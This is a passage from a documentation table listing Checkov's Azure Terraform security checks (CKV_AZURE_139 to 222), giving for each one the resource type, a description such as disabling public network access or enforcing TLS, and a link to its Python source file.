[ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | -| 1383 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | -| 1384 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | -| 1385 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | -| 1386 | CKV_AZURE_142 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | -| 1387 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | -| 1388 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | -| 1389 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1390 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1391 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1392 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1393 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1394 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1395 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | -| 1396 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | -| 1397 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | -| 1398 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 1399 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 1400 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | -| 1401 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | -| 1402 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | -| 1403 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1404 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1405 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1406 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | -| 1407 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | -| 1408 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | -| 1409 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | -| 1410 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure that databricks workspace is not public | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | -| 1411 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | -| 1412 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | -| 1413 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | -| 1414 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | -| 1415 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | -| 1416 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | -| 1417 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | -| 1418 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | -| 1419 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | -| 1420 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | -| 1421 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | -| 1422 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1423 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1424 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | -| 1425 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | -| 1426 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | -| 1427 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | -| 1428 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | -| 1429 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | -| 1430 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | -| 1431 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | -| 1432 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1433 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1434 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1435 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1436 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1437 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1438 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1439 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1440 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | -| 1441 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. | Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | -| 1442 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1443 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1444 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | -| 1445 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | -| 1446 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | -| 1447 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. | Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | -| 1448 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | -| 1449 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | -| 1450 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | -| 1451 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | -| 1452 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | -| 1453 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | -| 1454 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | -| 1455 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | -| 1456 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | -| 1457 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | -| 1458 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | -| 1459 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | -| 1460 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | -| 1461 | CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | -| 1462 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | -| 1463 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | -| 1464 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | -| 1465 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | -| 1466 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | -| 1467 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | -| 1468 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | -| 1469 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | -| 1470 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | -| 1471 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | -| 1472 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | -| 1473 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | -| 1474 | CKV_AZURE_213 | resource | azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1475 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1476 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1477 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1478 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1479 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | -| 1480 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | -| 1481 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | -| 1482 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | -| 1483 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | -| 1484 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | -| 1485 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1486 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1487 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1488 | CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1489 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1490 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1491 | 